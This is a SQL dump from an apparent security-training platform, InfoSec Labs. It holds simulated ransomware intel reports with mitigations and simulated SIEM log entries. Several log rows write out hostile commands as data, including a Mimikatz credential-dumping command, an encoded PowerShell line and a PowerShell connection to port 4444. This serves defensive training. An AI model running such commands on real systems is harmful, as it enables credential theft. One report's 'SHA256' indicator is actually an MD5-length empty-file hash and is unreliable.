(932, 188, 1578, 2, 'Malicious Macro Execution: Technical Breakdown', '# Malicious Macro Execution: Technical Breakdown\n\n## Overview\nFollowing the phishing email detection, the execution phase was triggered by a malicious macro embedded in an email attachment. This report delves into the macro\'s functionality and its role in the ransomware deployment.\n\n## Technical Details\n- **Macro Functionality**: Upon execution, the macro downloads an executable payload from a remote server.\n- **Obfuscation Techniques**: The macro uses obfuscation to evade detection, including character encoding and environment checks.\n- **Payload Characteristics**: The downloaded payload is a lightweight downloader that retrieves the main ransomware binary.\n\n## Mitigation Strategies\n- Disable macros in Microsoft Office by default.\n- Use endpoint protection solutions with macro protection capabilities.', '2026-03-15 19:15:50'),
(933, 188, 1579, 3, 'Scheduled Tasks for Persistence: Mechanism and Detection', '# Scheduled Tasks for Persistence: Mechanism and Detection\n\n## Context\nPost-execution, NoEscape ransomware establishes persistence through the creation of scheduled tasks. This report examines the methods used to maintain persistence and suggests detection strategies.\n\n## Persistence Mechanism\n- **Task Creation**: A new scheduled task is created to execute the ransomware binary at system startup or at regular intervals.\n- **Task Obfuscation**: Task names are designed to mimic legitimate system processes to avoid detection.\n\n## Detection and Response\n- Monitor for anomalous scheduled tasks creation.\n- Implement logging for task scheduler activities.\n- Regularly audit scheduled tasks for unauthorized entries.', '2026-03-15 19:15:50'),
(934, 188, 1580, 4, 'SMB Protocol Exploitation: Lateral Movement Insights', '# SMB Protocol Exploitation: Lateral Movement Insights\n\n## Introduction\nThis report focuses on the lateral movement stage of the NoEscape ransomware operation, specifically the exploitation of the SMB protocol to propagate across the network.\n\n## Lateral Movement Techniques\n- **SMB Exploitation**: Exploiting known vulnerabilities in SMB to move laterally between systems.\n- **Credential Harvesting**: Utilizing harvested credentials to access additional systems via SMB shares.\n\n## Defense Measures\n- Patch and update systems to address SMB vulnerabilities.\n- Implement network segmentation to limit lateral movement potential.\n- Employ intrusion detection systems to monitor SMB traffic for unusual activity.', '2026-03-15 19:15:50'),
(935, 188, 1581, 5, NULL, NULL, '2026-03-15 19:15:50'),
(936, 189, 1582, 1, 'Virtual Machine Deployment and Malicious Execution', '### Summary\nFollowing the initial access via a suspicious download from a known malicious domain, there is evidence of a new virtual machine being deployed. This VM is suspected to be leveraged by Ragnar Locker\'s ransomware operators for malicious activities.\n\n### Key Indicators\n- **VM Deployment:** A virtual machine was executed shortly after the initial access was granted.\n- **Malicious Intent:** The VM\'s configuration files indicate potential malicious payloads are being prepared.\n\n### Recommendations\n- Closely monitor virtual machine activities and configurations for unusual changes.\n- Implement strict access controls and verification processes for VM deployments.', '2026-03-15 19:16:11'),
(937, 189, 1583, 2, 'Persistence Mechanisms via VM Configuration', '### Summary\nAfter the execution of a virtual machine with suspected malicious intent, persistence mechanisms have been identified in the VM configuration settings. These configurations suggest efforts to maintain long-term access within the network.\n\n### Key Insights\n- **Configuration Changes:** Several unauthorized changes in the VM\'s configuration files have been detected.\n- **Scheduled Tasks:** Tasks are scheduled within the VM to ensure continuous operation and potential re-execution upon disruption.\n\n### Recommendations\n- Conduct a full audit of VM configurations and scheduled tasks.\n- Establish alerts for unauthorized configuration changes in virtual environments.', '2026-03-15 19:16:11'),
(938, 189, 1584, 3, 'Lateral Movement Techniques within Gaming Networks', '### Summary\nPost establishing persistence, there are signs of lateral movement within the gaming network. This suggests the adversaries are expanding their reach to potentially compromise additional systems.\n\n### Observations\n- **Network Scans:** Evidence of internal network scanning originating from the compromised VM to identify additional targets.\n- **Credential Harvesting:** Attempts to capture login credentials from various endpoints have been observed.\n\n### Recommendations\n- Implement network segmentation to limit lateral movement capabilities.\n- Increase logging and monitoring of network traffic for signs of unauthorized access.', '2026-03-15 19:16:11');
INSERT INTO `operation_alerts` (`id`, `operation_id`, `alert_id`, `sequence_order`, `intel_report_title`, `intel_report_content`, `created_at`) VALUES
(939, 189, 1585, 4, 'Data Exfiltration via Encrypted Channels', '### Summary\nThe final stage of Ragnar Locker\'s operation involves data exfiltration through encrypted channels. This step indicates preparation for potential ransom demands or unauthorized data disclosures.\n\n### Evidence\n- **Encrypted Traffic:** A notable increase in encrypted traffic from the VM to an external server has been detected.\n- **Data Staging:** Files of interest were staged within the VM prior to exfiltration attempts.\n\n### Recommendations\n- Investigate and block suspicious external connections.\n- Employ data loss prevention strategies to monitor and prevent unauthorized data transfers.', '2026-03-15 19:16:11'),
(940, 189, 1586, 5, NULL, NULL, '2026-03-15 19:16:11'),
(941, 190, 1587, 1, 'Investigation into Phishing Techniques Utilized by Mount Locker', '### Overview\nAfter the initial alert regarding phishing activity, our analysis reveals that the Mount Locker group leverages sophisticated phishing techniques to gain initial access into corporate networks.\n\n### Phishing Email Characteristics\n- **Sender Spoofing:** Emails appeared to originate from trusted business partners.\n- **Social Engineering:** Messages contained urgent requests for invoice verification or document review.\n- **Malicious Attachments:** Attachments disguised as PDFs contained embedded macros triggering the malware.\n\n### Recommendations\n- **User Training:** Enhance employee awareness programs focusing on phishing detection.\n- **Email Filtering:** Implement advanced threat protection to detect and quarantine suspicious emails before reaching end-users.\n\nThis report provides context and preparedness for the next phase of the attack, where payload execution is expected.', '2026-03-15 19:16:21'),
(942, 190, 1588, 2, 'Payload Execution and Initial Malware Analysis', '### Overview\nFollowing the detection of malware execution, a detailed analysis of the payload has been conducted to understand its capabilities and implications.\n\n### Key Findings\n- **Type of Malware:** The payload is identified as a variant of Mount Locker ransomware.\n- **Execution Method:** The malware utilizes PowerShell scripts to execute in-memory, reducing its footprint on the disk.\n- **Immediate Impact:** Initial file encryption detected on compromised endpoints.\n\n### Defensive Measures\n- **Endpoint Detection:** Deploy advanced EDR solutions to monitor and block suspicious scripts.\n- **Network Segmentation:** Limit the spread by ensuring critical data is isolated from infected endpoints.\n\nUnderstanding the payload\'s characteristics is crucial for anticipating persistence mechanisms employed by the attackers.', '2026-03-15 19:16:21'),
(943, 190, 1589, 3, 'Persistence Mechanisms and Scheduled Task Analysis', '### Overview\nPost payload execution, the adversaries have established persistence through scheduled tasks. This report delves into the methods used to maintain access.\n\n### Persistence Techniques\n- **Scheduled Tasks:** A task is created to run the ransomware at system start, ensuring continuous presence.\n- **Registry Modifications:** Entries are added to ensure tasks are re-created if deleted.\n\n### Recommendations\n- **Audit Scheduled Tasks:** Regularly review and audit scheduled tasks for unauthorized entries.\n- **Registry Monitoring:** Implement alerts for suspicious registry changes related to task creation.\n\nUnderstanding persistence aids in preempting the attackers\' lateral movement efforts, which are likely to follow.', '2026-03-15 19:16:21'),
(944, 190, 1590, 4, NULL, NULL, '2026-03-15 19:16:21'),
(945, 191, 1591, 1, 'Investigation into Spear Phishing Origins', '### Summary\nFollowing the detection of a spear phishing email, our analysis has traced the origins to a known phishing campaign linked to Maze ransomware affiliates. The email contained malicious attachments designed to deploy initial malware payloads.\n\n### Technical Details\n- **Sender:** Compromised legitimate business email addresses\n- **Attachments:** Encrypted ZIP files with embedded malware\n- **Targets:** High-level executives and financial departments\n\n### Recommendations\n- Conduct a thorough review of email filtering systems.\n- Implement immediate awareness training for all employees on recognizing phishing attempts.', '2026-03-15 19:16:51'),
(946, 191, 1592, 2, 'Analysis of Malware Execution on User Workstation', '### Summary\nPost malware execution on a user workstation, the analysis reveals the malware\'s capability to deploy additional payloads and establish a foothold within the network.\n\n### Technical Details\n- **Payload:** First-stage downloader leading to ransomware deployment\n- **Execution Method:** Exploitation of unpatched software vulnerabilities\n- **Indicators of Compromise (IOCs):**\n  - Unusual registry changes\n  - Network traffic to command and control (C2) servers\n\n### Recommendations\n- Isolate the infected workstation immediately.\n- Patch all software vulnerabilities across the network.', '2026-03-15 19:16:51'),
(947, 191, 1593, 3, 'Persistence Mechanism via Scheduled Task', '### Summary\nThe adversary has established persistence on the compromised system through the creation of a scheduled task designed to execute malicious scripts at regular intervals.\n\n### Technical Details\n- **Scheduled Task Name:** \'System Maintenance\'\n- **Script Execution:** Powershell scripts obfuscated to avoid detection\n- **Persistence Goal:** Maintain access and facilitate further lateral movement\n\n### Recommendations\n- Disable and remove unauthorized scheduled tasks.\n- Implement continuous monitoring for any new task creation attempts.', '2026-03-15 19:16:51'),
(948, 191, 1594, 4, 'Lateral Movement and Network Compromise', '### Summary\nLateral movement has been detected within the network, indicating the adversary\'s attempt to escalate privileges and access sensitive data across multiple systems.\n\n### Technical Details\n- **Methods Used:**\n  - Pass-the-Hash attacks\n  - Exploitation of SMB vulnerabilities\n- **Targeted Systems:** Domain controllers and file servers\n\n### Recommendations\n- Conduct a comprehensive audit of network access logs.\n- Reinforce network segmentation to limit lateral movement opportunities.', '2026-03-15 19:16:51'),
(949, 191, 1595, 5, NULL, NULL, '2026-03-15 19:16:51'),
(950, 192, 1596, 1, 'Analysis of Phishing Campaign Techniques', '## Overview\nFollowing the recent alert targeting retail employees, it is crucial to understand the phishing techniques employed by the Egregor group. This report will explore these techniques, focusing on spear-phishing emails designed to mimic internal communications.\n\n## Key Tactics\n- **Social Engineering:** Emails crafted to appear as urgent internal messages from senior management.\n- **Malicious Links and Attachments:** Utilization of links leading to credential-stealing websites or attachments containing malicious macros.\n\n## Recommendations\n- **Employee Training:** Implement regular phishing simulation exercises to enhance awareness.\n- **Email Filtering:** Strengthen email filtering solutions to detect and quarantine suspicious communications.\n', '2026-03-15 19:17:07'),
(951, 192, 1597, 2, 'Technical Analysis of Malicious Payload', '## Overview\nFollowing the detection of malicious payload execution, this report delves into the technical aspects of the payload used by Egregor.\n\n## Payload Characteristics\n- **Obfuscation:** Utilizes advanced obfuscation techniques to evade antivirus detection.\n- **Ransomware Component:** Once executed, it encrypts files with a robust encryption algorithm.\n\n## Indicators of Compromise (IOCs)\n- **File Names:** Commonly seen file names include `invoice.docx` and `update.exe`.\n- **Hashes:** SHA256: `d41d8cd98f00b204e9800998ecf8427e`\n\n## Mitigation Strategies\n- **Endpoint Protection:** Deploy advanced endpoint detection and response (EDR) solutions.\n- **Network Monitoring:** Set up alerts for unusual file execution patterns.\n', '2026-03-15 19:17:07'),
(952, 192, 1598, 3, 'Persistence Mechanisms and Countermeasures', '## Overview\nAs persistence mechanisms are established, understanding these techniques is vital to mitigate their effects.\n\n## Persistence Techniques\n- **Registry Keys:** Modification of Windows registry keys to maintain persistence.\n- **Scheduled Tasks:** Creation of scheduled tasks that ensure the payload re-executes upon system reboot.\n\n## Countermeasures\n- **Registry Monitoring:** Implement real-time monitoring of registry changes.\n- **System Hardening:** Disable unnecessary services and ports.\n\n## Conclusion\nDetecting and neutralizing persistence mechanisms is crucial to prevent further network infiltration by the ransomware group.\n', '2026-03-15 19:17:07'),
(953, 192, 1599, 4, 'Lateral Movement and Network Security Enhancements', '## Overview\nThis report addresses the lateral movement observed across the retail network, shedding light on how Egregor navigates internal systems.\n\n## Lateral Movement Tactics\n- **Credential Dumping:** Harvesting credentials from compromised systems to propagate.\n- **Remote Execution:** Utilizes tools like PsExec and Cobalt Strike to execute commands on remote machines.\n\n## Security Enhancements\n- **Network Segmentation:** Implement micro-segmentation to limit movement within the network.\n- **Access Controls:** Enforce strict access controls and regularly update passwords.\n\n## Next Steps\nStrengthening internal defenses is pivotal to thwart further movement and protect sensitive data from exfiltration.\n', '2026-03-15 19:17:07'),
(954, 192, 1600, 5, NULL, NULL, '2026-03-15 19:17:07'),
(955, 193, 1601, 1, 'Analysis of Phishing Tactics Employed by NetWalker', '### Overview\nAfter identifying a phishing email used as the initial access vector, a detailed examination of the email headers and content has been conducted. The email contained a malicious link, disguised as a legitimate communication from a trusted entity within the healthcare sector.\n\n### Key Findings\n- **Sender Spoofing**: The sender\'s address was spoofed to appear as a legitimate internal contact.\n- **Malicious Link**: The link redirected to a compromised website hosting a malicious script.\n- **Targets**: Primarily aimed at high-ranking officials to maximize impact.\n\n### Recommendations\n- Implement enhanced email filtering rules to detect similar phishing attempts.\n- Conduct awareness training to help staff identify phishing emails.', '2026-03-15 19:17:34'),
(956, 193, 1602, 2, 'Fileless PowerShell Execution: Techniques and Indicators', '### Overview\nFollowing the initiation of a fileless attack via PowerShell, further analysis has revealed the use of obfuscated scripts to execute malicious commands without leaving traces on the disk.\n\n### Key Findings\n- **Obfuscation**: The PowerShell scripts were heavily obfuscated to evade detection.\n- **Memory-Resident Execution**: Malicious activities were executed directly in memory, minimizing forensic evidence.\n- **Command and Control (C2) Communications**: Detected via encoded commands reaching out to C2 servers for further instructions.\n\n### Recommendations\n- Enable enhanced logging for PowerShell scripts to capture suspicious activities.\n- Utilize endpoint detection and response (EDR) tools to monitor and analyze memory-based activities.', '2026-03-15 19:17:34'),
(957, 193, 1603, 3, 'Scheduled Task Persistence Method Analysis', '### Overview\nA scheduled task was created to ensure persistence on compromised systems. This task was designed to re-initiate malicious activities after a system reboot.\n\n### Key Findings\n- **Task Name Mimicry**: The task was named to resemble legitimate system tasks to avoid detection.\n- **Execution Timing**: Configured to execute at system startup to maintain persistence.\n- **Payload Delivery**: Linked to a PowerShell script that re-establishes the connection with the C2 server.\n\n### Recommendations\n- Review and audit scheduled tasks regularly to identify unauthorized entries.\n- Implement policies to restrict the creation of scheduled tasks by non-administrative users.', '2026-03-15 19:17:34'),
(958, 193, 1604, 4, 'Credential Dumping Techniques and Lateral Movement Indicators', '### Overview\nUnauthorized access was detected, indicating an attempt at lateral movement through credential dumping techniques.\n\n### Key Findings\n- **Credential Harvesting**: Tools like Mimikatz were used to extract credentials from memory.\n- **Lateral Movement**: Compromised credentials were employed to access additional systems within the network.\n- **Targeted Systems**: Focused on servers containing sensitive healthcare and educational data.\n\n### Recommendations\n- Implement multi-factor authentication (MFA) to mitigate risks associated with credential theft.\n- Utilize network segmentation to limit lateral movement opportunities for attackers.', '2026-03-15 19:17:34'),
(959, 193, 1605, 5, NULL, NULL, '2026-03-15 19:17:34'),
(960, 194, 1606, 1, 'Analysis of Spear Phishing Tactics', '### Spear Phishing Email Detected\n\nFollowing the detection of a spear phishing email, analysis reveals that the email was crafted using social engineering techniques to target specific personnel with access to critical infrastructure. **Key Indicators:**\n- **Sender Email:** Spoofed to appear as a trusted internal source.\n- **Content:** Contains an urgent message urging immediate action.\n- **Attachments/Links:** Malicious attachment disguised as a critical update.\n\nThis report lays the groundwork for understanding how the attacker gained initial access, anticipating further malicious activity.', '2026-03-15 19:18:01'),
(961, 194, 1607, 2, 'Malicious Payload Analysis', '### Malicious Payload Activation\n\nAfter the execution of the spear phishing attack, a malicious payload was activated on the targeted system. **Key Analysis Points:**\n- **Payload Type:** The payload is identified as a variant of DoppelPaymer ransomware.\n- **Behavior:** It begins encrypting files and alters system settings.\n- **Potential Impact:** Immediate risk to data integrity and availability.\n\nUnderstanding this activation provides insight into the attacker\'s next steps, likely focusing on establishing persistence.', '2026-03-15 19:18:01'),
(962, 194, 1608, 3, 'Registry Key Modification Insights', '### Persistence Mechanism Identified\n\nPost-payload activation, modifications to the registry keys were detected, indicating attempts to establish persistence. **Key Details:**\n- **Registry Changes:** New entries created for auto-starting the ransomware on boot.\n- **Stealth Tactics:** Obfuscation techniques used to avoid detection by standard monitoring tools.\n\nThis persistence mechanism suggests the attacker’s intention to maintain long-term access, priming the environment for lateral movement.', '2026-03-15 19:18:01'),
(963, 194, 1609, 4, 'Credential Dumping Techniques', '### Credential Dumping Detected\n\nCredential dumping activity has been identified, signaling lateral movement within the network. **Key Observations:**\n- **Tools Used:** Common tools such as Mimikatz have been employed.\n- **Targeted Accounts:** Focus on administrative accounts with elevated privileges.\n- **Network Impact:** Increased risk of further infiltration and spread of ransomware.\n\nThis activity highlights the critical need to safeguard user credentials and monitor network traffic for anomalies.', '2026-03-15 19:18:01'),
(964, 194, 1610, 5, 'Data Exfiltration Dynamics', '### Data Transfer to External Server\n\nData exfiltration has been detected, with sensitive information being transferred to an external server. **Critical Insights:**\n- **Exfiltration Method:** Encrypted transfers to avoid detection.\n- **Data Types:** Includes sensitive operational and personnel data.\n- **Potential Consequences:** Increased risk of data breaches and potential follow-up attacks.\n\nUnderstanding these dynamics provides context for the ransomware\'s impact, setting the stage for the extortion attempts in the NRA attack.', '2026-03-15 19:18:01'),
(965, 194, 1611, 6, NULL, NULL, '2026-03-15 19:18:01'),
(966, 195, 1612, 1, 'Initial Phishing Tactics and Strategies', '## Initial Phishing Tactics and Strategies\n\n### Overview\nThe initial alert involves a suspicious phishing email detected within Capcom\'s network. This phishing attempt is believed to be the initial vector for the Ragnar Locker ransomware attack.\n\n### Analysis\n- **Email Source:** The email originated from a compromised external address, masquerading as a trusted partner.\n- **Email Content:** The email contained a malicious attachment disguised as a legitimate business document.\n- **Delivery Method:** Spear-phishing tactics aimed at specific individuals within the organization, particularly those with administrative access.\n\n### Recommendations\n- **Training:** Immediate cybersecurity awareness training for employees focusing on phishing detection.\n- **Monitoring:** Enhanced email filtering and monitoring for suspicious activities.\n\n### Next Steps\nPrepare for the possibility of malicious scripts executing within the network, indicating a move to the next stage of the attack.', '2026-03-15 19:18:11'),
(967, 195, 1613, 2, 'PowerShell Execution and Compromise Progression', '## PowerShell Execution and Compromise Progression\n\n### Current Status\nFollowing the phishing email detection, unusual PowerShell execution has been observed, signaling the transition from initial access to execution.\n\n### Detailed Findings\n- **Execution Method:** PowerShell scripts executed remotely, potentially using the credentials obtained from the phishing attack.\n- **Purpose:** The scripts are designed to establish persistence and facilitate lateral movement within the network.\n- **Indicators of Compromise:** New registry keys, suspicious network traffic, and unauthorized script execution.\n\n### Mitigation Measures\n- **Script Blocking:** Implement strict policies to block or log PowerShell script execution.\n- **Credential Management:** Immediate review and rotation of compromised credentials.\n\n### Next Steps\nThe possibility of persistence mechanisms being established should be investigated, as it may lead to the creation of unauthorized user accounts.', '2026-03-15 19:18:11'),
(968, 195, 1614, 3, 'Persistence and Unauthorized Account Creation', '## Persistence and Unauthorized Account Creation\n\n### Situation Update\nThe detection of new user account creation indicates the attacker\'s efforts to maintain persistent access within Capcom\'s network.\n\n### Key Observations\n- **Account Characteristics:** Newly created accounts with elevated privileges, not aligning with standard operating procedures.\n- **Activity Logs:** Unexplained access attempts and logins from these accounts.\n- **Potential Targets:** Critical systems and databases, including game data servers.\n\n### Defensive Actions\n- **Account Audit:** Conduct a thorough audit of all user accounts and permissions.\n- **Access Restrictions:** Temporarily restrict access to sensitive systems until the integrity of user accounts is verified.\n\n### Next Steps\nThe focus should now shift to monitoring for data exfiltration activities, as attackers may attempt to transfer large volumes of data out of the network.', '2026-03-15 19:18:11'),
(969, 195, 1615, 4, NULL, NULL, '2026-03-15 19:18:11');

-- --------------------------------------------------------

--
-- Table structure for table `organizations`
--

CREATE TABLE `organizations` (
  `id` int(11) NOT NULL,
  `name` varchar(255) NOT NULL,
  `slug` varchar(100) NOT NULL,
  `owner_id` int(11) NOT NULL,
  `logo_url` varchar(500) DEFAULT NULL,
  `stripe_customer_id` varchar(100) DEFAULT NULL,
  `stripe_subscription_id` varchar(100) DEFAULT NULL,
  `license_seats` int(11) DEFAULT 5,
  `used_seats` int(11) DEFAULT 1,
  `plan_type` enum('team','business','enterprise') DEFAULT 'team',
  `settings` longtext CHARACTER SET utf8mb4 COLLATE utf8mb4_bin DEFAULT NULL,
  `is_active` tinyint(1) DEFAULT 1,
  `created_at` timestamp NOT NULL DEFAULT current_timestamp(),
  `updated_at` timestamp NOT NULL DEFAULT current_timestamp() ON UPDATE current_timestamp()
) ;

-- --------------------------------------------------------

--
-- Table structure for table `organization_invites`
--

CREATE TABLE `organization_invites` (
  `id` int(11) NOT NULL,
  `organization_id` int(11) NOT NULL,
  `email` varchar(255) NOT NULL,
  `token` varchar(100) NOT NULL,
  `role` enum('admin','member') DEFAULT 'member',
  `invited_by` int(11) NOT NULL,
  `expires_at` timestamp NOT NULL DEFAULT current_timestamp() ON UPDATE current_timestamp(),
  `accepted_at` timestamp NULL DEFAULT NULL,
  `created_at` timestamp NOT NULL DEFAULT current_timestamp()
) ENGINE=MyISAM DEFAULT CHARSET=latin1 COLLATE=latin1_swedish_ci;

-- --------------------------------------------------------

--
-- Table structure for table `organization_members`
--

CREATE TABLE `organization_members` (
  `id` int(11) NOT NULL,
  `organization_id` int(11) NOT NULL,
  `user_id` int(11) NOT NULL,
  `role` enum('owner','admin','member') DEFAULT 'member',
  `joined_at` timestamp NOT NULL DEFAULT current_timestamp(),
  `invited_by` int(11) DEFAULT NULL
) ENGINE=MyISAM DEFAULT CHARSET=latin1 COLLATE=latin1_swedish_ci;

-- --------------------------------------------------------

--
-- Table structure for table `password_resets`
--

CREATE TABLE `password_resets` (
  `id` int(11) NOT NULL,
  `email` varchar(255) NOT NULL,
  `token` varchar(255) NOT NULL,
  `created_at` datetime DEFAULT current_timestamp()
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_general_ci;

-- --------------------------------------------------------

--
-- Table structure for table `simulated_logs`
--

CREATE TABLE `simulated_logs` (
  `id` int(11) NOT NULL,
  `timestamp` datetime NOT NULL DEFAULT current_timestamp(),
  `source_ip` varchar(45) DEFAULT NULL,
  `dest_ip` varchar(45) DEFAULT NULL,
  `event_type` varchar(100) DEFAULT NULL,
  `action` varchar(50) DEFAULT NULL,
  `raw_data` longtext CHARACTER SET utf8mb4 COLLATE utf8mb4_bin DEFAULT NULL CHECK (json_valid(`raw_data`)),
  `index_name` varchar(50) DEFAULT 'main',
  `alert_id` int(11) DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;

--
-- Dumping data for table `simulated_logs`
--

INSERT INTO `simulated_logs` (`id`, `timestamp`, `source_ip`, `dest_ip`, `event_type`, `action`, `raw_data`, `index_name`, `alert_id`) VALUES
(1, '2026-03-01 08:15:23', '10.0.0.45', '185.220.101.34', 'connection', 'blocked', '{\"src_ip\":\"10.0.0.45\",\"dst_ip\":\"185.220.101.34\",\"port\":443,\"action\":\"blocked\",\"bytes_in\":0,\"bytes_out\":256,\"rule\":\"TOR_EXIT_NODE_BLOCK\"}', 'firewall_traffic', NULL),
(2, '2026-03-01 08:16:45', '10.0.0.22', '192.168.1.100', 'connection', 'allowed', '{\"src_ip\":\"10.0.0.22\",\"dst_ip\":\"192.168.1.100\",\"port\":8080,\"action\":\"allowed\",\"bytes_in\":4096,\"bytes_out\":1024,\"rule\":\"INTERNAL_ALLOW\"}', 'firewall_traffic', NULL),
(3, '2026-03-01 09:22:11', '203.0.113.50', '10.0.0.12', 'connection', 'blocked', '{\"src_ip\":\"203.0.113.50\",\"dst_ip\":\"10.0.0.12\",\"port\":22,\"action\":\"blocked\",\"bytes_in\":0,\"bytes_out\":0,\"rule\":\"SSH_BRUTE_FORCE\"}', 'firewall_traffic', NULL),
(4, '2026-03-02 14:05:33', '10.0.0.88', '104.26.10.5', 'connection', 'allowed', '{\"src_ip\":\"10.0.0.88\",\"dst_ip\":\"104.26.10.5\",\"port\":443,\"action\":\"allowed\",\"bytes_in\":52000,\"bytes_out\":3200,\"rule\":\"HTTPS_ALLOW\"}', 'firewall_traffic', NULL),
(5, '2026-03-01 10:30:00', '10.0.0.15', NULL, 'logon', 'success', '{\"EventID\":4624,\"User\":\"jsmith\",\"LogonType\":10,\"Status\":\"Success\",\"Workstation\":\"WS-ADMIN-01\",\"SourceIP\":\"10.0.0.15\"}', 'windows_events', NULL),
(6, '2026-03-01 10:32:15', '10.0.0.15', NULL, 'logon', 'failed', '{\"EventID\":4625,\"User\":\"admin\",\"LogonType\":3,\"Status\":\"Bad Password\",\"Workstation\":\"WS-ADMIN-01\",\"SourceIP\":\"10.0.0.15\"}', 'windows_events', NULL),
(7, '2026-03-01 11:45:22', '10.0.0.33', NULL, 'logon', 'failed', '{\"EventID\":4625,\"User\":\"administrator\",\"LogonType\":10,\"Status\":\"Account Locked\",\"Workstation\":\"SRV-DC-01\",\"SourceIP\":\"10.0.0.33\"}', 'windows_events', NULL),
(8, '2026-03-02 06:00:01', '10.0.0.5', NULL, 'service', 'success', '{\"EventID\":7045,\"User\":\"SYSTEM\",\"ServiceName\":\"WindowsUpdate\",\"Status\":\"Running\"}', 'windows_events', NULL),
(9, '2026-03-01 12:15:44', '10.0.0.22', NULL, 'process_create', 'logged', '{\"EventID\":1,\"User\":\"jdoe\",\"ProcessName\":\"powershell.exe\",\"CommandLine\":\"powershell -enc SQBFAHgA\",\"ParentProcessName\":\"cmd.exe\",\"Hashes\":\"SHA256=a1b2c3d4e5f6\"}', 'sysmon_events', NULL),
(10, '2026-03-01 12:20:33', '10.0.0.22', '185.123.231.45', 'network_connect', 'logged', '{\"EventID\":3,\"User\":\"jdoe\",\"ProcessName\":\"powershell.exe\",\"DestinationIp\":\"185.123.231.45\",\"DestinationPort\":4444,\"Protocol\":\"TCP\"}', 'sysmon_events', NULL),
(11, '2026-03-02 09:10:55', '10.0.0.40', NULL, 'process_create', 'logged', '{\"EventID\":1,\"User\":\"admin\",\"ProcessName\":\"mimikatz.exe\",\"CommandLine\":\"mimikatz.exe \\\"sekurlsa::logonpasswords\\\"\",\"ParentProcessName\":\"explorer.exe\",\"Hashes\":\"SHA256=deadbeef1234\"}', 'sysmon_events', NULL),
(12, '2026-03-01 15:00:12', '198.51.100.23', NULL, 'ConsoleLogin', 'success', '{\"userIdentity\":{\"userName\":\"admin-user\"},\"eventSource\":\"signin.amazonaws.com\",\"eventName\":\"ConsoleLogin\",\"userAgent\":\"Mozilla/5.0\",\"sourceIPAddress\":\"198.51.100.23\"}', 'aws_cloudtrail', NULL),
(13, '2026-03-01 15:05:33', '198.51.100.23', NULL, 'CreateUser', 'success', '{\"userIdentity\":{\"userName\":\"admin-user\"},\"eventSource\":\"iam.amazonaws.com\",\"eventName\":\"CreateUser\",\"userAgent\":\"aws-cli/2.0\",\"sourceIPAddress\":\"198.51.100.23\"}', 'aws_cloudtrail', NULL),
(14, '2026-03-02 03:22:11', '45.33.32.156', NULL, 'GetSecretValue', 'success', '{\"userIdentity\":{\"userName\":\"lambda-role\"},\"eventSource\":\"secretsmanager.amazonaws.com\",\"eventName\":\"GetSecretValue\",\"userAgent\":\"aws-sdk-python\",\"sourceIPAddress\":\"45.33.32.156\"}', 'aws_cloudtrail', NULL),
(15, '2026-03-01 16:45:00', '10.0.0.55', NULL, 'detection', 'quarantined', '{\"alert_name\":\"Suspicious PowerShell Execution\",\"severity\":\"High\",\"sensor_id\":\"SENSOR-WS22\",\"tactic\":\"Execution\",\"technique\":\"T1059.001\",\"process_name\":\"powershell.exe\",\"file_path\":\"C:\\\\\\\\Users\\\\\\\\jdoe\\\\\\\\Downloads\\\\\\\\update.ps1\",\"sha256\":\"abc123def456\",\"action_taken\":\"quarantined\"}', 'crowdstrike_edr', NULL),
(16, '2026-03-02 11:30:22', '10.0.0.12', NULL, 'detection', 'blocked', '{\"alert_name\":\"Credential Dumping via LSASS\",\"severity\":\"Critical\",\"sensor_id\":\"SENSOR-DC01\",\"tactic\":\"Credential Access\",\"technique\":\"T1003.001\",\"process_name\":\"rundll32.exe\",\"file_path\":\"C:\\\\\\\\Windows\\\\\\\\Temp\\\\\\\\dump.dll\",\"sha256\":\"deadbeef5678\",\"action_taken\":\"blocked\"}', 'crowdstrike_edr', NULL),
(17, '2026-03-03 07:12:00', '192.168.1.102', '8.8.8.8', 'dns', 'allowed', '{\"src_ip\":\"192.168.1.102\",\"dst_ip\":\"8.8.8.8\",\"port\":53,\"action\":\"allowed\",\"bytes_in\":128,\"bytes_out\":64,\"rule\":\"DNS_ALLOW\"}', 'firewall_traffic', NULL),
(18, '2026-03-03 08:45:33', '192.168.1.55', '10.0.0.1', 'connection', 'denied', '{\"src_ip\":\"192.168.1.55\",\"dst_ip\":\"10.0.0.1\",\"port\":3389,\"action\":\"denied\",\"bytes_in\":0,\"bytes_out\":0,\"rule\":\"RDP_BLOCK_EXTERNAL\"}', 'firewall_traffic', NULL),
(19, '2026-03-03 12:00:00', '10.0.0.100', '151.101.1.140', 'connection', 'allowed', '{\"src_ip\":\"10.0.0.100\",\"dst_ip\":\"151.101.1.140\",\"port\":443,\"action\":\"allowed\",\"bytes_in\":98000,\"bytes_out\":5400,\"rule\":\"HTTPS_ALLOW\"}', 'firewall_traffic', NULL),
(20, '2026-03-04 02:33:11', '45.155.205.233', '10.0.0.5', 'scan', 'blocked', '{\"src_ip\":\"45.155.205.233\",\"dst_ip\":\"10.0.0.5\",\"port\":445,\"action\":\"blocked\",\"bytes_in\":0,\"bytes_out\":0,\"rule\":\"SMB_EXTERNAL_BLOCK\"}', 'firewall_traffic', NULL);

-- --------------------------------------------------------

--
-- Table structure for table `student_domains`
--

CREATE TABLE `student_domains` (
  `id` int(11) NOT NULL,
  `domain` varchar(255) NOT NULL,
  `added_by` int(11) DEFAULT NULL,
  `created_at` timestamp NOT NULL DEFAULT current_timestamp()
) ENGINE=MyISAM DEFAULT CHARSET=latin1 COLLATE=latin1_swedish_ci;

--
-- Dumping data for table `student_domains`
--

INSERT INTO `student_domains` (`id`, `domain`, `added_by`, `created_at`) VALUES
(1, 'georgebrown.ca', 1, '2026-01-27 22:21:57');

-- --------------------------------------------------------

--
-- Table structure for table `system_settings`
--

CREATE TABLE `system_settings` (
  `key` varchar(255) NOT NULL,
  `value` longtext CHARACTER SET utf8mb4 COLLATE utf8mb4_bin DEFAULT NULL,
  `category` varchar(50) DEFAULT NULL,
  `updated_at` datetime DEFAULT current_timestamp()
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_general_ci;

--
-- Dumping data for table `system_settings`
--

INSERT INTO `system_settings` (`key`, `value`, `category`, `updated_at`) VALUES
('account_deleted_body', '\"<h1>Account Deleted</h1><p>Hi {{name}},</p><p>Your account has been successfully deleted from InfoSec Labs. We are sorry to see you go.</p>\"', 'email_template', '2026-03-13 05:11:26'),
